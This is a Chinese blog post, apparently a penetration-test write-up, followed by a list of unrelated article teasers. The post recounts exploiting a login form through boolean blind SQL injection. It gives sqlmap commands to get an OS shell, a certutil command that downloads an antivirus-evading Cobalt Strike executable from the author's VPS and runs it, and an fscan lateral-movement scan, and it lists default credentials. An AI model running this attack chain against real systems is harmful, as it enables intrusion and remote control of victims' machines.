记一次从登录框到内网横向

news2024/11/17 1:50:01

前言

接到公司通知要对某某行业做渗透测试,挖一些尽可能高危的漏洞,于是便有了接下来的故事。

0x01 信息收集
首先收集了十几个该行业相关的网站,然后一个个做信息收集,先列出来可利用的点。

1.某某公司为YouDianCMS(可能存在注入)。

2.某集团OA,使用的是通达OA。

3.某管理系统,存在登录框,无验证码。

4.某监控管理系统,存在登录框,无验证码。5.某收费系统,使用的是若依管理系统。


0x02 漏洞利用

1.通达OA

习惯性先试一下通达OA,通达OA的利用工具比较方便,若存在漏洞可以一键getshell,不过利用失败了。

2.测试YouDianCMS

之前收集的youdianCMS的sql注入的POC,直接利用,但是还是不存在该漏洞。

3.测试若依管理系统

1)测试默认口令:admin/admin123,失败。

2)测试shiro反序列化漏洞。

均失败了。

4.测试某管理系统

爆破密码。爆出来了弱口令admin/456123,但是登录进去后找了一圈没有geshell的点,一个弱口令肯定没法交差。

5.测试某监控管理系统的登录框

最后一个点了,再不行要重新打点了,本来也没报什么希望,登录框做渗透测试几乎没挖到过什么大的漏洞。

首先测试弱口令,爆破了一圈没有弱口令,扫目录也没扫出什么东西,JS代码里也没泄露有用的信息,突然想到还没试注入,这一试,果然有问题。

当参数loginName的值后边修改为and'q'='q"时,页面返回密码错误,修改为and'u'='k"时,页面返回用户不存在,说明页面存在布尔盲注。

sqlmap一把梭:

sqlmap.py -r 1.txt --dbs --random-agent --proxy=http://127.0.0.1:7890

跑出来了数据库,但是跑表的时候出错了,不知道为什么跑不出来。

直接获取shell试试:

sqlmap.py -r 1.txt --os-shell --random-agent --proxy=http://127.0.0.1:7890

可以执行命令,但是回显的巨慢。

本来想着已经成功了,接下来的拿shell就水到渠成,没想到又曲折了一番。

1.CS直接生成powershell命令,然后令目标系统执行,执行完毕一直没上线,然后想着让sqlmap回显一下看看有什么问题,等了十几分钟页面才回显完,应该是有杀软,页面返回的是“检测到该命令为危险命令”,就给拦截了。

2.直接生成exe肯定也不行,这时候就要让大佬帮忙了。

免杀马到手,Windows通过certutil命令进行远程下载。先把免杀马上传到VPS上,然后开一个http服务。然后在shell中执行:

certutil -urlcache -split -f http://xx.xx.xx.xx/cs.exe dll.exe

然后直接通过命令运行:

dll.exe

这回想着肯定能成功,结果等了半天还是没反应,一脸懵逼,看了下VPS,有下载记录呀。

难道被sha了?

想执行一下dir看看目录下有没有该文件,但是目录下有几百个文件,要等全部都回显要等半小时。

最后想了想是不是该目录下没有权限,于是在目标系统的D盘新建一个dll文件夹,然后把免杀马写到这里。

certutil -urlcache -split -f http://xx.xx.xx.xx/cs.exe d:\dll\dll.exe

然后执行:

d:\dll\dll.exe

终于成功上线。

0x03 横向攻击

看一下目标机器有哪些敏感文件可利用,收获颇丰呀。

fscan横向一波,发现了几个站点,但是没有扫到能直接利用的漏洞。

由于领导说的只是让挖到漏洞,所以要问下领导能否进行横向攻击,先点到为止。

0x04 总结

之前做渗透每次遇到登录框都比较头疼,因为登录框可利用的点比较少,也没在登录框上挖到过什么大的漏洞,但是本次运气还是比较好的,总算可以交差了。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2173402.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

车载诊断技术:汽车健康的守护者

一、车载诊断技术的发展历程 从最初简单的硬件设备到如今智能化、网络化的系统,车载诊断技术不断演进,为汽车安全和性能提供保障。 早期的汽车诊断检测技术处于比较原始的状态,主要依靠操作经验和主观评价。随着汽车工业的发展,车载诊断技术也经历了不同的阶段。20 世纪初…

Java生成Markdown格式内容

前一篇写的是markdown格式的文本内容转换保存为word文档,是假定已经有一个现成的markdown格式的文本,然后直接转换保存为word文档,不过在开发中,通常情况下,数据是从数据库中获取,拿到的数据映射到java对象…

趋势外推法

趋势外推法主要利用图形识别法和差分法计算,进行模型的基本选择。 一、图形识别法。 这种方法是通过绘制散点图来进行的,即将时间序列的数据绘制成以时间 t 为横轴、时序观察值为纵轴的图形,观察并将其变化曲线与各类函数曲线模型的图形进行…

物联网系统中高精度温度检测方案_温度变送器

01 物联网系统中为什么要使用温度变送器 在物联网系统中使用温度变送器的原因主要可以归纳为以下几点: 1、温度监测与控制 实时数据获取:温度变送器能够将温度这一物理量转换为可传输的标准化电信号(如4-20mA电流信号、0-10V电压信号或RS48…

Spring Boot 进阶-Spring Boot 开发第一个Web接口

在前面的文章中我们对Spring Boot的配置以及日志配置有了大概的了解,在我们搭建完成第一个Spring Boot项目之后也提到了一个概念就是RestFul风格的接口开发。下面我们就来详细介绍一下使用Spring Boot如何去开发一个RestFul的Web接口。 准备 在开发接口之前,需要引入的就是W…

一文上手Kafka【中】

一、发送消息细节 在发送消息的特别注意: 在版本 3.0 中,以前返回 ListenableFuture 的方法已更改为返回 CompletableFuture。为了便于迁移,2.9 版本添加了一个方法 usingCompletableFuture(),该方法为 CompletableFu…

【工具类】证书自动续签免费版 正式发布

证书自动续签免费版 正式发布 1.控制台首页2.申请证书2.1.支持自动解析和手动解析两种模式2.2.LB(负载均衡)支持主流的云厂商2.3.CDN(内容分发) 支持主流的云厂商2.4.对象存储(OSS)支持主流云厂商2.5DCDN&a…

TDengine 在业务落地与架构改造中的应用实践!

前言 在物联网和大数据时代,时序数据的管理和分析变得至关重要。TDengine,作为一款专为时序数据设计的开源数据库,以其卓越的存储和查询效率,成为众多企业优化数据架构的优选。本文将分享我将TDengine成功应用于实际业务的经验&am…

elementui/plus灯下面的指示怎么改成圆圈或者隐藏

改成圆圈的步骤 改成没有indicator-position指示的位置/或者隐藏

用友U8 CRM 多个接口存在SQL注入漏洞

本文所涉及的任何技术、信息或工具,仅供学习和参考之用,请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者无关。请遵守《中华人民共和国网络安全法》。 中华人民共和国网络安全法 第二十七条 规定 任何个人和组织不得从事非…

保姆级复现yolov7(论文复现)

保姆级复现yolov7(论文复现) 本文所涉及所有资源均在传知代码平台可获取 所需环境 当然深度学习环境的搭建是基础,详情可见(win10): 【深度学习】windows10环境配置详细教程anaconda3环境变量配置win10-CSDN博客 Unbutun搭建深度学…

正则表达式的使用示例--Everything文件检索批量重命名工具

一、引言 Everything是一款非常实用的文件搜索工具,它可以帮助您快速定位并查找计算机中的文件和文件夹。Everything搜索文件资料之神速,有使用过的朋友们都深有体会,相对于Windows自带的搜索功能,使用Everything,可以…

C语言 | Leetcode C语言题解之第442题数组中重复的数据

题目&#xff1a; 题解&#xff1a; int* findDuplicates(int* nums, int numsSize, int* returnSize) { int *ans (int *)malloc(sizeof(int) * numsSize);int pos 0;for (int i 0; i < numsSize; i) {int x abs(nums[i]);if (nums[x - 1] > 0) {nums[x - 1] -…

$attrs 和 $listeners

通常情况下&#xff0c;父子组件之间的数据是通过 props 由父向子传递的&#xff0c;当子组件想要修改数据时&#xff0c;则需要通过 $emit 以事件形式交由父组件完成&#xff0c;而这种交互方式只存在于父子组件之间&#xff0c;多层嵌套的时候&#xff0c;处于内层的组件想要…

OpenAI o1与GPT-4o究竟强在哪里

OpenAI 的 O1 模型与 GPT-4o 相比&#xff0c;具有显著的技术进步和性能提升。以下是两者的主要区别和 O1 的进步之处&#xff1a; 推理能力&#xff1a;O1 模型在处理复杂问题&#xff08;如编程和数学&#xff09;方面表现出更强的推理能力。例如&#xff0c;在国际数学奥林匹…

使用ffmpeg合并视频和音频

使用ffmpeg合并视频和音频 - 哔哩哔哩 简介 FFmpeg是一套可以用来记录、转换数字音频、视频&#xff0c;并能将其转化为流的开源计算机程序。采用LGPL或GPL许可证。它提供了录制、转换以及流化音视频的完整解决方案。它包含了非常先进的音频/视频编解码库libavcodec&#xff0…

【项目文档】软件系统培训方案(Doc原件2024)

1. 培训概述 2. 培训目的 3. 培训对象及要求 3.1. 培训对象 3.2. 培训人员基本要求 4. 培训方式 5. 培训内容 6. 培训讲师 7. 培训教材 8. 培训质量保证 8.1. 用户培训确认报告 8.2. 培训疑问解答 软件全套资料部分文档清单&#xff1a; 工作安排任务书&#xff0c;可行性分析报…

【JAVA开源】基于Vue和SpringBoot的师生健康管理系统

博主说明&#xff1a;本文项目编号 T 052 &#xff0c;文末自助获取源码 \color{red}{T052&#xff0c;文末自助获取源码} T052&#xff0c;文末自助获取源码 目录 一、系统介绍二、演示录屏三、启动教程四、功能截图五、文案资料5.1 选题背景5.2 国内外研究现状5.3 可行性分析…

【数据结构】排序算法系列——计数排序(附源码+图解)

计数排序 顾名思义&#xff1a;统计每个数据出现的次数。 算法思想 我们根据《算法导论》中给出对于计数排序的讨论&#xff1a; 对每一个输入元素 x, 确定小于 x 的元素个数。利用这一信息&#xff0c;就可以直接把 x 放到它在输出数组中的位置上了。例如&#xff0c;如果…

秋招即将来临,AIGC 产品经理 快速入门方法论

AIGC 产品经理是什么 AIGC 产品经理是人工智能与大数据技术融合背景下应运而生的一种新型职业&#xff0c;负责从 AI 产品的设计、开发到推广的全过程&#xff0c;确保其顺利推向市场并实现良好的商业价值。 更具体地说&#xff0c;AIGC 产品经理就是将 AI 能生产内容的能力完…